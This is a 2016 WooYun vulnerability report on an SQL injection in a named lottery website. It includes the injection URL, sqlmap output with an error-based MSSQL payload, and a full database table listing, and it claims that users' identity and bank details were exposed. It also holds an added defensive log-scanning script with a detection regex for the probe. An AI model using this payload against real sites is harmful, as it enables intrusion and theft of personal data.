
Vulnerability summary

Defect ID: wooyun-2016-0169767

Title: 555CAIPIAO main site SQL injection (exposes all users' names, ID card numbers, emails, phone numbers, bank account numbers and addresses)

Related vendor: 长沙市起航网络科技有限公司

Author: 头晕脑壳疼

Submitted: 2016-01-14 09:22

Fix time: 2016-02-27 11:49

Disclosed: 2016-02-27 11:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-14: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-02-27: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Seriously short of WB (WooYun coins)

Detailed description:

Injection point
http://555caipiao.com/ctzq/?betTypeId=38&issueNum=2016009
GET parameter 'issueNum' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 286 HTTP(s) requests:
---
Parameter: issueNum (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: betTypeId=38&issueNum=2016009 AND 3554=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3554=3554) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)))
---
[01:26:53] [INFO] testing Microsoft SQL Server
[01:26:53] [INFO] confirming Microsoft SQL Server
[01:26:56] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[01:26:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 58 times

1.png
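As an added defender-side example that is not part of the original report, the following Python scans web-server access logs for the two signals visible in the sqlmap output above: a numeric parameter (issueNum, betTypeId) carrying the Microsoft SQL Server error-based probe pattern (CONVERT(INT, ...) built from CHAR() calls), and a client producing a burst of HTTP 500s. The log lines, client IPs, 500-count threshold and the shortened probe string are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the report): one benign
# request, one carrying a shortened form of the report's error-based
# MSSQL probe, one with a stray quote, and the 500s that probing causes.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jan/2016:01:26:40 +0800] "GET /ctzq/?betTypeId=38&issueNum=2016009 HTTP/1.1" 200 5120
10.0.0.9 - - [14/Jan/2016:01:26:53 +0800] "GET /ctzq/?betTypeId=38&issueNum=2016009%20AND%203554%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%29%29 HTTP/1.1" 500 812
10.0.0.9 - - [14/Jan/2016:01:26:53 +0800] "GET /ctzq/?betTypeId=38&issueNum=2016009%27 HTTP/1.1" 500 812
10.0.0.9 - - [14/Jan/2016:01:26:54 +0800] "GET /ctzq/?betTypeId=38&issueNum=2016009 HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Signature of the error-based MSSQL technique in the report's payload:
# CONVERT(INT, ...) wrapped around a string assembled from CHAR(n) calls.
MSSQL_ERROR_PROBE = re.compile(r'CONVERT\s*\(\s*INT\s*,.*CHAR\s*\(\s*\d+\s*\)', re.I | re.S)
# Parameters the endpoint only ever receives as integers (assumption).
NUMERIC_PARAMS = ("betTypeId", "issueNum")

def classify_request(target):
    """Return (parameter, finding) pairs for one request target (path + query)."""
    findings = []
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)  # URL-decodes values
    for name in NUMERIC_PARAMS:
        for value in qs.get(name, []):
            if MSSQL_ERROR_PROBE.search(value):
                findings.append((name, "mssql-error-based-probe"))
            elif not value.isdigit():
                findings.append((name, "non-numeric-value"))
    return findings

def scan_log(text, error_threshold=2):
    """Flag probing requests and clients that trigger repeated HTTP 500s."""
    alerts, errors_by_ip = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, kind in classify_request(m["target"]):
            alerts.append((m["ip"], name, kind))
        if m["status"] == "500":
            errors_by_ip[m["ip"]] += 1
    for ip, n in errors_by_ip.items():
        if n >= error_threshold:
            alerts.append((ip, "*", f"http-500-burst:{n}"))
    return alerts
```

The same numeric check applied server-side (reject issueNum unless it is an integer, and bind it as a parameter rather than concatenating it into the query) is the fix the report's "fix recommendation" section does not give.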


Database information
Database: caipiao
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| dbo.T_b_Team | 46448446 |
| dbo.T_b_LetGoalDetail | 4440623 |
| dbo.T_b_TotalScoreDetail | 3279781 |
| dbo.matchDetail | 2858454 |
| dbo.T_TotalScore | 2536771 |
| dbo.T_b_Schedule_Result | 1430658 |
| dbo.T_LetgoalHalf | 1359627 |
| dbo.T_TotalScoreHalf | 1303182 |
| dbo.T_Date | 1209373 |
| dbo.T_Standard | 1205299 |
| dbo.T_Letgoal | 935928 |
| dbo.T_Schedule | 822870 |
| dbo.T_b_StandardDetail | 730401 |
| dbo.t_raceResult | 704374 |
| dbo.T_TotalScoreHalfDetail | 630091 |
| dbo.T_BeginTime | 359821 |
| dbo.T_b_TotalScore | 263245 |
| dbo.T_b_Standard | 184962 |
| dbo.TicketsJczq | 142498 |
| dbo.UserProfitRatio | 135640 |
| dbo.UserProfitRatioView | 135640 |
| dbo.AutoOut | 124830 |
| dbo.Score | 118741 |
| dbo.T_HalfFull | 101914 |
| dbo.T_BigSmallScore | 101911 |
| dbo.T_SingleDoubleScore | 101910 |
| dbo.T_AllGoals | 101902 |
| dbo.T_b_Score | 89188 |
| dbo.CooperateBuyInfos | 88648 |
| dbo.CooperateBuyInfosCountView | 87537 |
| dbo.TransDetails | 80877 |
| dbo.TransDetailsView | 80877 |
| dbo.T_b_Schedule | 80683 |
| dbo.League | 80625 |
| dbo._temp | 80001 |
| dbo.CooperateBuyInfosView | 79527 |
| dbo.TicketsBjdc | 66689 |
| dbo.CarBase | 66621 |
| dbo.BackProfitRatio | 56990 |
| dbo.DetailsDotteryPlansProfitView | 54868 |
| dbo.MobileLoginUser | 47360 |
| dbo.T_Team | 35838 |
| dbo.CurrentOddsLast | 27224 |
| dbo.T_LetGoalDetail | 26251 |
| dbo.T_Schedule_Result | 23273 |
| dbo.lotteryPlansIssue | 22042 |
| dbo.T_b_letgoal | 21322 |
| dbo.TicketsNumber | 20554 |
| dbo.LotteryPlansMore | 19447 |
| dbo.Team | 17133 |
| dbo.DetailsDotteryPlansView | 14955 |
| dbo.LotteryPlans | 14947 |
| dbo.LotteryPlansChippedView | 14947 |
| dbo.LotteryPlansView | 14947 |
| dbo.CurrentOdds | 14468 |
| dbo.MobileVisitSum | 11884 |
| dbo.T_StandardDetail | 11700 |
| dbo.LotteryInfos | 10762 |
| dbo.LotteryInfosView | 10675 |
| dbo.NumberBase | 9620 |
| dbo.NumberBaseView | 9620 |
| dbo.User_ProfitRatio | 6754 |
| dbo.TicketsVictoryOrDefeat | 6306 |
| dbo.T_LetGoalHalfDetail | 5931 |
| dbo.Members_Profit | 5832 |
| dbo.NewsUrlInfo | 5451 |
| dbo.T_FMatchSeason | 4472 |
| dbo.TicketsJclq | 3838 |
| dbo.BonusResult | 3743 |
| dbo.CurrentOddsOpen | 2910 |
| dbo.userInfoView | 2848 |
| dbo.AccountInfos | 2825 |
| dbo.Users | 2777 |
| dbo.CarError | 2403 |
| dbo.TicketsCar | 2042 |
| dbo.MobileOtherInfoSum | 2034 |
| dbo.bjdcSchedul | 1562 |
| dbo.Drawings | 1479 |
| dbo.T_TotalScoreDetail | 1468 |
| dbo.DrawingsView | 1402 |
| dbo.T_leagueCup | 1327 |
| dbo.T_LotteryRelation | 1180 |
| dbo.T_Sclass | 1063 |
| dbo.T_FSclass | 1059 |
| dbo.bjdcschedule | 819 |
| dbo.UserLoginInformation | 810 |
| dbo.ScheduleAddInfos | 806 |
| dbo.bjdcScheduleView | 724 |
| dbo.UcPwd | 630 |
| dbo.MobilePayOrder | 617 |
| dbo.Citys | 525 |
| dbo.CurrentOddsLastView | 409 |
| dbo.Demo2 | 400 |
| dbo.T_b_League | 313 |
| dbo.T_b_Sclass | 226 |
| dbo.FilterResult | 218 |
| dbo.jczqscheduleView | 215 |
| dbo.OddsInfos | 189 |
| dbo.siteUsers | 165 |
| dbo.SelectedScheduleCompany | 149 |
| dbo.MobileOrderInfo | 136 |
| dbo.TicketsXysc | 134 |
| dbo.T_FCountry | 105 |
| dbo.ExtendUsers | 101 |
| dbo.Tickets | 100 |
| dbo.LotteryInfoTypes | 87 |
| dbo.jczqschedule | 76 |
| dbo.extendTotalMoneyView | 74 |
| dbo.siteAdministrator | 68 |
| dbo.OlympicStake | 63 |
| dbo.OlympicEventItems | 56 |
| dbo.OddsInfos_Hc | 54 |
| dbo.BetTypes | 50 |
| dbo.BetTypesView | 49 |
| dbo.ATotalMoneyView | 41 |
| dbo.Provinces | 35 |
| dbo.Company | 22 |
| dbo.Demo1 | 20 |
| dbo.TransTypes | 20 |
| dbo.DataUrl | 16 |
| dbo.Lotterys | 16 |
| dbo.newsType | 16 |
| dbo.BTotalMoneyView | 12 |
| dbo.NumberBaseNewView | 11 |
| dbo.CTotalMoneyView | 9 |
| dbo.NewsArea | 9 |
| dbo.DTotalMoneyView | 8 |
| dbo.OlympicEvent | 7 |
| dbo.Admins | 5 |
| dbo.T_FArea | 5 |
| dbo.rebate | 4 |
| dbo.ETotalMoneyView | 3 |
| dbo.cashBack | 2 |
| dbo.LotteryResults | 2 |
| dbo.SsqPrizeInfo | 2 |
| dbo.siteType | 1 |
| dbo.ws_users | 1 |
+-----------------------------------+---------+
Admin account information

2.png


Leaked account holders' names, ID card numbers, emails, phone numbers, bank account numbers and addresses

3.png


Proof of vulnerability:

Injection point
http://555caipiao.com/ctzq/?betTypeId=38&issueNum=2016009

Fix recommendation:

If you're afraid of the information leaking out, have the reviewers blur it!

Copyright notice: please credit the source when reposting: 头晕脑壳疼@WooYun


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused

Vulnerability Rank: 15 (WooYun rating)